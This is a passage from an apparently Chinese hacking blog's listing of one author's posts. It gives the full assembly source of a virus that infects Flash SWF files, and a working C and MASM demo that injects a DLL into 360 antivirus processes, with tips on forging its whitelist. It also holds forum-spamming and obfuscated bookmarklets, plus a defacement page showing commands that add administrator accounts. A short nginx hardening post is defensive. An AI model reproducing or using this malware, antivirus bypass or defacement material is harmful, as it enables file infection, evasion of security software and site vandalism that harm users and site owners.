搜索到
285
篇与
Jonty
的结果
-
-
-
-
-
-
第一只感染flash的病毒源代码 代码如下:SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Masm Version 6.11: ML.EXE SWF.ASM ; Virus Size: 926 bytes ; Infection Size: 3247 bytes. ; Last Edit: 01/08/2002 ; --------------------------------- Begin Source Code ------------------------------------ .286 .model tiny .code org 100h Entry: jmp Start VIR_SIZE equ Virus_End-Entry DTA db 128 dup(0) ; Offset DTA+30 = filename HANDLE dw ? ; Handle to host file PTR1 dd 0 ; Segment address of the created memory block PATH db "*.SWF",0 ; File mask BINARY db "v.com",0 ; Binary code HEX db "0123456789ABCDEF" ; Binary to hex ; Flash header block. ; ------------------- SIGN_FW dw ? ; SWF file format SIGN_S db ? VERSION_NUM db ? FILE_LENGTH dw ? dw ? STATIC_HDR_SIZE equ $-SIGN_FW RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( RECT_BUF_SIZE equ $-RECT_BUF HDR_SIZE dw ? ; Holds the true header size! ; Start of Viral Frame 0. ; ----------------------- Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] dw 0 db 083h ; ActionGetUrl Tag ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE) db FSCommand:exec db 000h db cmd.exe db 009h ; chr(9) is Flash code for a space character. db /c db 009h db echo db 009h db Loading.Flash.Movie... db & db (echo db 009h db n db 009h db v.com&echo db 009h db a db 009h db 100& Drop_BEGIN_SIZE equ $-Drop_BEGIN Drop_MIDDLE db echo db 009h db db db 009h db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. db & Drop_MIDDLE_SIZE equ $-Drop_MIDDLE Drop_END db &echo.&echo db 009h db rcx&echo db 009h db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. db &echo db 009h db w&echo db 009h db q)|debug.exe>nul&start db 009h db /b db 009h db v.com db 000h ; StringEnd Tag Drop_END_SIZE equ $-Drop_END ; End of Viral Frame 0. ; --------------------- END_TAG db 001h ; Action code 0x01 = tagshowframe Tag Start: mov ax,(VIR_SIZE+0fh) shr ax,4 shl ax,1 mov bx,ax ; Allocate (VirusSize*2) mov ah,4ah int 21h ; Resize block jc ExProg mov dx,offset DTA ; Set DTA operation mov ah,1ah int 21h mov cx,07h mov dx,offset PATH mov ah,4eh ; FindFirst int 21h jc ExProg jmp Infect Cycle: mov dx,offset PATH mov ah,4fh ; FindNext int 21h jc ExProg jmp Infect ExProg: mov ax,4301h ; Hide v.com mov cx,02h mov dx,offset BINARY int 21h mov ax,4c00h ; End program int 21h Infect: mov byte ptr DTA[30+12],$ mov dx,offset (DTA+30) mov ax,3d02h ; Open host file int 21h jc ExProg mov [HANDLE],ax ; Save file handle mov ax,3f00h ; Read file Header mov dx,offset SIGN_FW mov bx,[HANDLE] mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) int 21h jc ExProg cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. jne Cycle ; Try another file ... cmp byte ptr SIGN_S,S jne Cycle cmp byte ptr VERSION_NUM,099h ; Already infected? je Cycle mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. xor di,di ; Seems to always exist directly after the header. next: cmp byte ptr RECT_BUF[di],043h jne not_found cmp byte ptr RECT_BUF[di+1],002h jne not_found jmp found not_found: inc di loop next jmp Cycle found: mov word ptr HDR_SIZE,STATIC_HDR_SIZE add word ptr HDR_SIZE,di ; Compute the header size mov ax,4200h ; Reset file ptr right after Flash header xor cx,cx mov dx,[HDR_SIZE] int 21h jc ExProg push bx mov ax,word ptr FILE_LENGTH add ax,15 shr ax,4 mov bx,ax mov ah,48h ; Allocate memory for target host file int 21h pop bx jc ExProg mov word ptr PTR1[2],ax ; Save pointer to allocated block mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ah,3fh ; Read host file into memory block push ds lds dx,[PTR1] int 21h pop ds jc ExProg mov ax,4200h ; Reset file ptr to the middle code section xor cx,cx mov dx,[HDR_SIZE] add dx,Drop_BEGIN_SIZE int 21h jc ExProg ; ; The following code is a key technique. It simply converts the ; virus from binary to hex characters and then inserts them into the host ; using a standard format that DEBUG.EXE expects! Flash only really ; allows plain text, so this satisfies that condition. ; mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) push bx mov cx,VIR_SIZE xor si,si xor di,di ToHex: mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber mov al,byte ptr Entry[si] mov ah,al and al,00001111y xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al shr ax,12 xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al inc si inc di inc di inc di mov ax,si mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. div bl or ah,ah jnz cont push cx xor di,di add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE mov bx,[HANDLE] ; Write hex dump entry XX,...,XX mov dx,offset Drop_MIDDLE mov cx,Drop_MIDDLE_SIZE mov ax,4000h int 21h jc ExProg pop cx cont: loop ToHex pop bx or di,di jz no_remainder mov dx,offset Drop_MIDDLE mov cx,di add cx,7 ; STATIC_HDR_SIZE-1 add word ptr ACTION_LENGTH,cx mov ax,4000h ; Write remainder hex dump entry XX,...,XX int 21h jc ExProg no_remainder: mov dx,offset Drop_END mov cx,Drop_END_SIZE+1 mov ax,4000h ; Write end code and end of frame tag(01) into host int 21h jc ExProg mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ax,4000h ; Write host code directly after viral code. push ds lds dx,[PTR1] int 21h pop ds jc ExProg ; Patch the header with new viral values. mov cx,word ptr ACTION_LENGTH add cx,4 mov word ptr TAG_LENGTH,cx add cx,6 add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) ; Set infection marker mov byte ptr VERSION_NUM,099h mov di,[HDR_SIZE] inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 mov ax,4200h ; Re-wind to start of file xor cx,cx xor dx,dx int 21h jc ExProg mov dx,offset SIGN_FW mov cx,[HDR_SIZE] mov ax,4000h ; Write updated viral header int 21h jc ExProg mov dx,offset Drop_BEGIN mov cx,Drop_BEGIN_SIZE mov ax,4000h ; Write begin code into host int 21h jc ExProg mov ah,49h ; Free memory block mov es,word ptr PTR1[2] int 21h jc ExProg mov ax,3e00h ; Close file int 21h jc ExProg jmp Cycle ; DONE! Try to infect another. Virus_End: end Entry
-
linux之nginx安全讲解 nginx大家了解了一部分了,就剩下代理和负载均衡没讲,看看论坛中对linux喜欢的也不是太多,所以就没继续了,就讲了前四课,开始吧...一、nginx安全1、配置文件安全nginx 1.3默认有个解析漏洞,所以我们需要修改下配置文件service nginx reload在配置文件中,修改error,防止版本泄漏...2、目录安全yum install acl来进行安装tmp默认是777的权限,一般拿到shell后都会放在tmp下进行反弹,做好权限3.用户安全默认nginx是nobody,修改权限以上是最简单的一个安全修改方式吧,其实还有很多很多...二、针对问题今天一个朋友问我,真对各种攻击该怎么防御,怎么去操作,下面就针对这个问题进行个人看法...1、ddos攻击,采用的是UDP、SYN洪水等之类的,小规模的可以采用cdn加速,具体怎么配置,可以谷歌、百度2、通过nginx日志查看非法IP,然后进行访问,可以先建立break.list,然后在配置文件中加一句include break.list然后重启服务就可以了,把要拒绝的ip全部放到break.list里面3、服务器多的话可以做负载均衡,可以做限制,10秒内访问多次的,自动跳转到别的服务器,这样可以抵抗一些简单的数据流三、linux运维下常用的命令1,查看nginx进程: ps aux | grep nginx | grep -v grep | wc -l 2,查看80端口的tcp连接: netstat -tan | grep "ESTABLISHED" | grep ":80" | wc -l 3,通过日志查看当天ip连接数,过滤重复: cat www.example.com-access.log | grep "26/February/2013" | awk '{print $$2}' | sort | uniq -c | sort -nr 4,当天ip连接数最高的ip都在干些什么(原来是蜘蛛): cat www.example.com-access.log | grep "26/February/2013:00" | grep "122.102.7.212" | awk '{print $$8}' | sort | uniq -c | sort -nr | head -n 10 5,当天访问页面排前10的url: cat www.example.com-access.log | grep "26/February/2013:00" | awk '{print $$8}' | sort | uniq -c | sort -nr | head -n 10 6,用tcpdump嗅探80端口的访问看看谁最高 tcpdump -i eth0 -tnn dst port 80 -c 1000 | awk -F"." '{print $$1"."$$2"."$$3"."$$4}' | sort | uniq -c | sort -nr 接着从日志里查看该ip在干嘛:cat www.example.com-access.log | grep 122.102.7.212| awk '{print $$1"\t"$$8}' | sort | uniq -c | sort -nr | less7,查看某一时间段的ip连接数:grep "2013:0[7-8]" www.example.com-access.log | awk '{print $$2}' | sort | uniq -c| sort -nr | wc -l==============================nginxlog_format main '[$$time_local] $$remote_addr $$status $$request_time $$body_bytes_sent "$$request" "$$http_referer"';access_log /var/log/nginx/www.example.com-access.log main;格式如下:[26/February/2013:11:52:15 +0800] 58.60.188.61 200 0.265 28 "POST /event/time HTTP/1.1" "http://host/loupan/207846/feature"通过日志查看当天ip连接数,过滤重复cat www.example.com-access.log | grep "26/February/2013" | awk '{print $$3}' | sort | uniq -c | sort -nr38 112.97.192.1620 117.136.31.14519 112.97.192.313 61.156.31.202 209.213.40.61 222.76.85.28当天访问页面排前10的url:cat www.example.com-access.log | grep "26/February/2013" | awk '{print $$8}' | sort | uniq -c | sort -nr | head -n 10找出访问次数最多的10个IPawk '{print $$3}' www.example.com-access.log |sort |uniq -c|sort -nr|head10680 10.0.21.171702 10.0.20.167823 10.0.20.51504 10.0.20.255215 58.60.188.61192 183.17.161.21638 112.97.192.1620 117.136.31.14519 112.97.192.316 113.106.88.10找出某天访问次数最多的10个IPcat /tmp/access.log | grep "26/February/2013" |awk '{print $$3}'|sort |uniq -c|sort -nr|head38 112.97.192.1620 117.136.31.14519 112.97.192.313 61.156.31.202 209.213.40.61 222.76.85.28当天ip连接数最高的ip都在干些什么:cat www.example.com-access.log | grep "10.0.21.17" | awk '{print $$8}' | sort | uniq -c | sort -nr | head -n 10224 /test/themes/default/img/logo_index.gif224 /test/themes/default/img/bg_index_head.jpg224 /test/themes/default/img/bg_index.gif219 /test/vc.php219 /213 /misc/js/global.js211 /misc/jsext/popup.ext.js211 /misc/js/common.js210 /sladmin/home197 /misc/js/flib.js找出访问次数最多的几个分钟awk '{print $$1}' www.example.com-access.log | grep "26/February/2013" |cut -c 14-18|sort|uniq -c|sort -nr|head24 16:4919 16:1716 16:5111 16:484 16:503 16:521 19:091 19:051 19:031 18:55!!! <div id='custom-copyright' data-title='黑客反病毒' data-href='http://bbs.hackav.com'></div>!!!
-
强杀360 只要是杀毒软件留给我们“输入”的地方,就有可能攻破它,就算它没有问题,我们制造问题。下面就是注入360模块的代码,我自己写了一个demo,很久以前的代码了,一直没有放出去,我想说一点的是,只要我们进入的360安装目录里面任何一个exe的进程之后,我们就可以随便在他的安装目录里面创建文件了,保护形同虚设,你想怎么干点什么,随便你,我的demo只是在360的目录里面创建了一个fuck.txt文本,当然如果你想加白名单的话,分析下这个文件sl2.db,这个文件加密很简单,只是base64加密,360sd的白名单就放在这里,之前分析过,很happy哦,这个文件里面的没一个条目我记得只记录了白名单文件最后一次修改的时间哦,也就是你把一个文件加入白名单的时候,360sd会获得这个文件的最后一次修改的时间,木有md5记录哦,也就是说,如果这个sl2.db有记录条目,你可以替换这个白名单文件,然后修改这个文件的最后一次修改的时间,ok,然后运行这个文件,噢,360sd傻逼了。不知道现在360sd修改这个文件的加密方式了木有,噢,扯远了,我只是随便说说而已,别想歪了。嘿嘿。ok,我的监视demo是用的c写的,测试dll是用汇编写的。替换的dll文件的路径在c代码里面修改,默认的是c:\test.dll,使用的360的模块文件是360hips.exe,这个文件概率大。监视demo,c代码:#define _WIN32_WINNT 0x0500 #include <windows.h> #include <shlwapi.h> #include <iostream.h> typedef DWORD (WINAPI THREADFUNC)(LPVOID lParam); BOOL IsInjectSucc() { HANDLE hMutex = NULL; hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "Thread_Exit"); if (hMutex) { //打开mutex成功说明注入成功了 CloseHandle(hMutex); return 1; } return 0; } DWORD AddProcess(LPVOID lParam) { while(TRUE) { if(IsInjectSucc()) { return 1; } //这里创建360的软件的进程,然后监视释放的dll文件然后替换掉。 //注意看我使用的目标exe --> 360hips.exe (因为这个概率高) ShellExecute(NULL, "open", "C:\\Program Files\\360\\360sd\\360hips.exe", NULL, NULL, SW_HIDE); Sleep(100); } return 1; } int main() { DWORD dwThreadID = 0; CreateThread(NULL, 0, (THREADFUNC *)AddProcess, NULL, 0, &dwThreadID); char szTempPath[MAX_PATH] = {0}; GetTempPath(MAX_PATH, szTempPath); HANDLE hDir = CreateFile(szTempPath, FILE_LIST_DIRECTORY, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL); if (INVALID_HANDLE_VALUE == hDir) { return 0; } while (TRUE) { DWORD dwHadRet = 0; char stNotify[1024] = {0}; FILE_NOTIFY_INFORMATION *lpNotify = (FILE_NOTIFY_INFORMATION *)stNotify; //注入成功,可以退出了. if (IsInjectSucc()) { break; } BOOL dwRet = ReadDirectoryChangesW(hDir, lpNotify, sizeof stNotify, TRUE, FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_SIZE | FILE_NOTIFY_CHANGE_LAST_WRITE | FILE_NOTIFY_CHANGE_CREATION, &dwHadRet, NULL, NULL); if (0 == dwRet) { continue; } while (TRUE) { if (lpNotify->Action == FILE_ACTION_MODIFIED) { char szFileName[1024] = {0}; WideCharToMultiByte(CP_OEMCP,0,lpNotify->FileName,-1,szFileName,sizeof(szFileName),NULL,FALSE); //简单的过滤文件 char *lpDll = NULL; lpDll = strrchr(szFileName, '.'); if (NULL == lpDll) { break; } lpDll = lpDll + 1; if (lstrcmpi("dll", lpDll)) { break; } //替换dll文件进行注入 char szFilePath[1024] = {0}; lstrcpy(szFilePath, szTempPath); PathAppend(szFilePath, szFileName); //这个dll就是我们要注入的dll文件,自己写一个dll测试就行了 char szInjectDllPath[MAX_PATH] = "c:\\test.dll"; cout<<szInjectDllPath<<endl; cout<<szFilePath<<endl; cout<<"替换360的dll的结果 :"; cout<<CopyFile(szInjectDllPath, szFilePath, FALSE)<<endl; } if (0 == lpNotify->NextEntryOffset) { break; } lpNotify = (FILE_NOTIFY_INFORMATION *)((LONG)lpNotify + (LONG)lpNotify->NextEntryOffset); } cout<<"******************"<<endl; } CloseHandle(hDir); return 0; }测试dll文件,masm写的.486 .model flat,stdcall option casemap:none include test.inc include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib include shlwapi.inc includelib shlwapi.lib include debug.inc includelib debug.lib .code DllEntry proc hInstance,dwReason,dwReserved LOCAL @szFilePath[512]:byte .if dwReason == DLL_PROCESS_ATTACH ;创建互斥量用来表示成功注入了,这个时候监视进程就可以退出了。 invoke CreateMutex,NULL,FALSE,CTEXT("Thread_Exit") invoke MessageBox,0,0,0,0 invoke GetModuleFileName,NULL,addr @szFilePath,sizeof @szFilePath invoke PathRemoveFileSpec,addr @szFilePath invoke PathAppend,addr @szFilePath,CTEXT("fuck.txt") invoke CreateFile,addr @szFilePath,GENERIC_READ or GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 invoke CloseHandle,eax .endif mov eax,TRUE ret DllEntry endp end DllEntry还是那么一句话,只要是有“输入”的地方,我们就可以分析进去,就可能有发现。做杀毒只是浮云,相信很多朋友耐心分析几天就可以搞定。如果有人把代码用在不正当的地方,本人概不负责
-
-
百度贴吧装x回帖方法 先把要回复的图片文字写好,验证码填好。复制的时候头两个字母“ja”不要复制,然后把剩下的复制到地址栏,最后再在最前面手动打上“ja”两个字母,再回车就OK了!长尾巴:javascript:var%20b=rich_postor._editor.getHtml();c=rich_postor._getData();c.content='<spanclass="apc_src_wrapper"><span%20class="apc_src_wrapper"><spanclass="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper">'+b+'<img%20pic_type="3"%20class="bde_image"%20src="http: imgsrc.baidu.com="" forum="" pic="" item="" 6f657e2eb9389b50e1daf96e8435e5dde7116e1d.jpg"%20height="1" %20width="1">';PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});void%200 贴吧蓝字(可能会被和谐):javascript: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[2-9ce-hj-m]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 3=prompt(\'输入要回复的蓝字\');2 4="";9(2 i=0;i<3.c;i++){g(3.7(i)<128){4+=3.charAt(i)}else{2 5=3.7(i);g((5&0xFC00)==h)5=(5-h)*1024+3.7(i+1)-0xDC00+0x10000,i++;{4+="&#"+5+";"}}}3=4.8(/<\\/?a[^>]*>/j,"").8(/&/j,"&");2 6=new Array();2 i=0;while(/<[^>]*>|&k;|@\\S*/.test(3)){6[i]=/<[^>]*>|&k;|@\\S*/.exec(3);3=3.8(6[i],"㊣");i++}4="";9(2 i=0;i<3.c;i++){4+="&#"+3.7(i)+";"}9(2 i=0;i<6.c;i++){2 l=6[i]+"";4=4.8(/㊣/,l)}2 e=f._getData();2 a=\'<a style="color: red;" href="http://\';2 b=\'/" target="_blank">\';2 d="< /a>";e.content=a+4+b+4+d;PostHandler.post(f._option.url,e,m(I){unsafeWindow.f.showAddResult(I)},m(I){});',[],23,'||var|str|out|uc|temps|charCodeAt|replace|for|||length||tieba|rich_postor|if|0xD800||gi|nbsp|temp|function'.split('|'),0,{})) 贴吧防和谐:javascript:a=function(text){var result="";for(var i=0;i<text.length;i++){result+='&#'+text.charcodeat(i)+';'};return result};var="" c="rich_postor._getData();c.content=a('请输入帖子内容');" posthandler.post(rich_postor._option.url,c,function(i){rich_postor.showaddresult(i)},function(i){});<br=""> 贴吧刷屏:javascript:var c=rich_postor._getData();c.content='请输入帖子内容';for(var i=1;i<=12;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0
-
-
分享一个黑页 挺帅一个一个黑页代码如下:XX*安全检测 <style type="text/css"><!-- body{ scrollbar-shadow-color:#FFFFFF; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color:#000000; scrollbar-arrow-color:#FFFFFF; scrollbar-base-color: #000000; scrollbar-track-color: #000000; overflow-y:auto; } --></style> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <p align="center"><img alt="国旗" src="http://bbs.micropoint.com.cn/attachments/month_0804/ufrG7EE=_jdZa8PHs6EFr.gif" width="240" height="131" longdesc="http://www.lansk.cn/lansepic0/UploadFile/2010123023141458.gif" /></p> <script type="text/javascript">// <![CDATA[ <!-- var from = 1; var to = 4; var delay = 55; var glowColor = "lime"; var i = to; var j = 0; textPulseDown(); var msg = "安全检测到此完毕,贵站漏洞相当多的........................................ " ; var interval=70 var spacelen=120; var space10=" "; var seq=0; function Scroll() { len = msg.length; window.status = msg.substring(0, seq+1); seq++; if(seq>=len ){ seq = 0; window.status = ''; window.setTimeout("Scroll();", interval ); } else window.setTimeout("Scroll();", interval ); } Scroll(); function trap_page_mouse_key_events () { var browser = navigator.appName.substring ( 0, 9 ); document.onmousedown = disable_right_click; if ( browser == "Microsoft" ) document.onkeydown = check_mousekey; else document.captureEvents( Event.MOUSEDOWN ); } window.onload=trap_page_mouse_key_events; function textPulseUp() { if (!document.all) return if (i < to) { theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")"; i++; theTimeout = setTimeout('textPulseUp()',delay); return 0; } if (i = to) { theTimeout = setTimeout('textPulseDown()',delay); return 0; } } function textPulseDown() { if (!document.all) return if (i > from) {theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")"; i--;theTimeout = setTimeout('textPulseDown()',delay);return 0;}if (i = from){theTimeout = setTimeout('textPulseUp()',delay);return 0;}}//--> // ]]></script> <form name="textform"> <center> <input type="hidden" name="LajiCurText" /> <textarea style="font-size: 12px; <br /> color: #00ff00; scrollbar-base-color: #000000; background-color: <br /> #000000; border-color: #00ff00;" name="textfield" readonly="readonly" rows="27" wrap="virtual<br">cols=99></textarea></center> <script type="text/javascript" language="javascript">// <![CDATA[ var pos=0; var LajiCurI=0; function LajiCur() { if(LajiCurI==0) document.textform.LajiCurText.value="_"; else if(LajiCurI==1) document.textform.LajiCurText.value=" "; else if(LajiCurI==2) document.textform.LajiCurText.value="_"; else if(LajiCurI>2) {document.textform.LajiCurText.value=" ";LajiCurI=0;} LajiCurI++; } setInterval("LajiCur()",delay); function ShowText(strText) { document.textform.textfield.value=strText.substring(0,pos++) +document.textform.LajiCurText.value; setTimeout("ShowText(strText)",50); if(pos==strText.length) { return; } }var strText = "\n 致尊敬的贵站站长\n——————————————————————————————————————————————————\n→ > 轻轻的我来了.\n→ > 给您带来了一个不幸的消息...\n→ > 由于您的网站.............\n→ > 含有严重漏洞....\n→ > 特依次方式通知站长............\n→ > 本人不是故意的``...!\n→ > 还请谅解...\n→ > 再次请谅解..谢谢..\n→ > ..以下文字纯属`虚构`娱乐而写..!\n——————————————————————————————————————————————————\n→ > net user gkroot /add \n→ >net localgroup administrators gkroot /add\n→ >net user guest /active:yes\n→ > net user guest 123456\n→ >net password 123456\n→ > ------------------------------\n→ >net time \\***.***.**.**\n→ > ...ftp -s:c:\1.txt\n→ > ...del c:\1.txt\n→ > 希望你轻轻的生气.嘿嘿.!!\n→ >`````````````````````````````````ノ过”冒犯了贵站请原谅````````` "; ShowText(strText); // ]]></script> <script type="text/javascript" language="JavaScript1.2">// <![CDATA[ if (document.all) document.body.style.cssText="border:20 ridge red" // ]]></script></form> <div align="center"> <p style="position: relative !important; left: 10000 !important;" align="center"><span style="color: #ee00ff; font-size: medium;"> by:XX </span><span style="color: #ff0000; font-family: Arial;"><b>安全检测````</b></span></p> <script type="text/javascript" language="JavaScript">// <![CDATA[ <!-- dynamicanimAttr = "www_helpor_net" animateElements = new Array() currentElement = 0 speed = 0 stepsZoom = 8 stepsWord = 8 stepsFly = 12 stepsSpiral = 16 steps = stepsZoom step = 0 outString = "" function helpor_net() { var ms = navigator.appVersion.indexOf("MSIE") ie4 = (ms>0) && (parseInt(navigator.appVersion.substring(ms+5, ms+6)) >= 4) if(!ie4) { if((navigator.appName == "Netscape") && (parseInt(navigator.appVersion.substring(0, 1)) >= 4)) { for (index=document.layers.length-1; index >= 0; index--) { layer=document.layers[index] if (layer.left==10000) layer.left=0 } } return } for (index=document.all.length-1; index >= document.body.sourceIndex; index--) { el = document.all[index] animation = el.getAttribute(dynamicanimAttr, false) if(null != animation) { if(animation == "dropWord" || animation == "flyTopRightWord" || animation == "flyBottomRightWord") { ih = el.innerHTML outString = "" i1 = 0 iend = ih.length while(true) { i2 = startWord(ih, i1) if(i2 == -1) i2 = iend outWord(ih, i1, i2, false, "") if(i2 == iend) break i1 = i2 i2 = endWord(ih, i1) if(i2 == -1) i2 = iend outWord(ih, i1, i2, true, animation) if(i2 == iend) break i1 = i2 } document.all[index].innerHTML = outString document.all[index].style.posLeft = 0 document.all[index].setAttribute(dynamicanimAttr, null) } if(animation == "zoomIn" || animation == "zoomOut") { ih = el.innerHTML outString = "<SPAN " + dynamicanimAttr + "=\"" + animation + "\" style=\"position: relative; left: 10000;\">" outString += ih outString += "</SPAN>" document.all[index].innerHTML = outString document.all[index].style.posLeft = 0 document.all[index].setAttribute(dynamicanimAttr, null) } } } i = 0 for (index=document.body.sourceIndex; index < document.all.length; index++) { el = document.all[index] animation = el.getAttribute(dynamicanimAttr, false) if (null != animation) { if(animation == "flyLeft") { el.style.posLeft = 10000-offsetLeft(el)-el.offsetWidth el.style.posTop = 0 } else if(animation == "flyRight") { el.style.posLeft = 10000-offsetLeft(el)+document.body.offsetWidth el.style.posTop = 0 } else if(animation == "flyTop" || animation == "dropWord") { el.style.posLeft = 0 el.style.posTop = document.body.scrollTop-offsetTop(el)-el.offsetHeight } else if(animation == "flyBottom") { el.style.posLeft = 0 el.style.posTop = document.body.scrollTop-offsetTop(el)+document.body.offsetHeight } else if(animation == "flyTopLeft") { el.style.posLeft = 10000-offsetLeft(el)-el.offsetWidth el.style.posTop = document.body.scrollTop-offsetTop(el)-el.offsetHeight } else if(animation == "flyTopRight" || animation == "flyTopRightWord") { el.style.posLeft = 10000-offsetLeft(el)+document.body.offsetWidth el.style.posTop = document.body.scrollTop-offsetTop(el)-el.offsetHeight } else if(animation == "flyBottomLeft") { el.style.posLeft = 10000-offsetLeft(el)-el.offsetWidth el.style.posTop = document.body.scrollTop-offsetTop(el)+document.body.offsetHeight } else if(animation == "flyBottomRight" || animation == "flyBottomRightWord") { el.style.posLeft = 10000-offsetLeft(el)+document.body.offsetWidth el.style.posTop = document.body.scrollTop-offsetTop(el)+document.body.offsetHeight } else if(animation == "spiral") { el.style.posLeft = 10000-offsetLeft(el)-el.offsetWidth el.style.posTop = document.body.scrollTop-offsetTop(el)-el.offsetHeight } else if(animation == "zoomIn") { el.style.posLeft = 10000 el.style.posTop = 0 } else if(animation == "zoomOut") { el.style.posLeft = 10000 el.style.posTop = 0 } else { el.style.posLeft = 10000-offsetLeft(el)-el.offsetWidth el.style.posTop = 0 } el.initLeft = el.style.posLeft el.initTop = el.style.posTop animateElements[i++] = el } } window.setTimeout("animate();", speed) } function offsetLeft(el) { x = el.offsetLeft for (e = el.offsetParent; e; e = e.offsetParent) x += e.offsetLeft; return x } function offsetTop(el) { y = el.offsetTop for (e = el.offsetParent; e; e = e.offsetParent) y += e.offsetTop; return y } function startWord(ih, i) { for(tag = false; i < ih.length; i++) { c = ih.charAt(i) if(c == '<') tag = true if(!tag) return i if(c == '>') tag = false } return -1 } function endWord(ih, i) { nonSpace = false space = false while(i < ih.length) { c = ih.charAt(i) if(c != ' ') nonSpace = true if(nonSpace && c == ' ') space = true if(c == '<') return i if(space && c != ' ') return i i++ } return -1 } function outWord(ih, i1, i2, dyn, anim) { if(dyn) outString += "<SPAN " + dynamicanimAttr + "=\"" + anim + "\" style=\"position: relative; left: 10000;\">" outString += ih.substring(i1, i2) if(dyn) outString += "</SPAN>" } function animate() { el = animateElements[currentElement] animation = el.getAttribute(dynamicanimAttr, false) step++ if(animation == "spiral") { steps = stepsSpiral v = step/steps rf = 1.0 - v t = v * 2.0*Math.PI rx = Math.max(Math.abs(el.initLeft), 200) ry = Math.max(Math.abs(el.initTop), 200) el.style.posLeft = Math.ceil(-rf*Math.cos(t)*rx) el.style.posTop = Math.ceil(-rf*Math.sin(t)*ry) } else if(animation == "zoomIn") { steps = stepsZoom el.style.fontSize = Math.ceil(50+50*step/steps) + "%" el.style.posLeft = 0 } else if(animation == "zoomOut") { steps = stepsZoom el.style.fontSize = Math.ceil(100+200*(steps-step)/steps) + "%" el.style.posLeft = 0 } else { steps = stepsFly if(animation == "dropWord" || animation == "flyTopRightWord" || animation == "flyBottomRightWord") steps = stepsWord dl = el.initLeft / steps dt = el.initTop / steps el.style.posLeft = el.style.posLeft - dl el.style.posTop = el.style.posTop - dt } if (step >= steps) { el.style.posLeft = 0 el.style.posTop = 0 currentElement++ step = 0 } if(currentElement < animateElements.length) window.setTimeout("animate();", speed) } helpor_net() //--> // ]]></script> <span class="STYLE1">-------------------------------------------------------------------------------------------------------------------</span> <p class="STYLE1">据检测,您本地的IP是: <script type="text/javascript" src="http://code.helpor.net/mine/ip.php"></script> ,对不对? ------------------------------------------------------------------------------------------------------------------- <script type="text/javascript" language="JavaScript">// <![CDATA[ <!-- if (document.all){ Cols=10; Cl=48;//Space's are included so real length is 24! Cs=120; Ts=18;//数字大小 Tc='#008800'; Tc1='#00ff00'; MnS=20; MxS=35;//数字变换速度 I=Cs; Sp=new Array();S=new Array();Y=new Array(); C=new Array();M=new Array();B=new Array(); RC=new Array();E=new Array();Tcc=new Array(0,1,2,3,4,5,6,7,8,9); document.write(" <div id='Container' style='position:absolute;top:0;left:-"+Cs+"'>"); document.write(" <div style='position:relative'>"); for(i=0; i < Cols; i++){ S=I+=Cs; document.write(" <div id='A' 